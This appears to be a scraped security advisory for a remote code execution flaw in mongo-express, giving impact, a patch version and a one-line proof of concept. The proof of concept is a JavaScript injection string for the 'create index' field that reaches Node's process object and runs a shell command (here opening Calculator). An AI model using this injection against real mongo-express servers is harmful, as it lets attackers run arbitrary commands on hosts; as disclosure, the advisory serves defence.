See how mongo-express project compares to other vendors in security performance
Impact
Remote code execution on the host machine by any authenticated user.
Proof Of Concept
Launching mongo-express on a Mac, pasting the following into the "create index" field will pop open the Mac calculator:
javascript this.constructor.constructor("return process")().mainModule.require('childprocess').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')
Patches Users should upgrade to version 0.54.0
Workarounds Is there a way for users to fix or remediate the vulnerability without upgrading?
For more information If you have any questions or comments about this advisory: Open an issue in example link to repo Email us at example email address
Thanks
@JLLeitschuh for finding and reporting this vulnerability
This vulnerability has been exploited in the wild.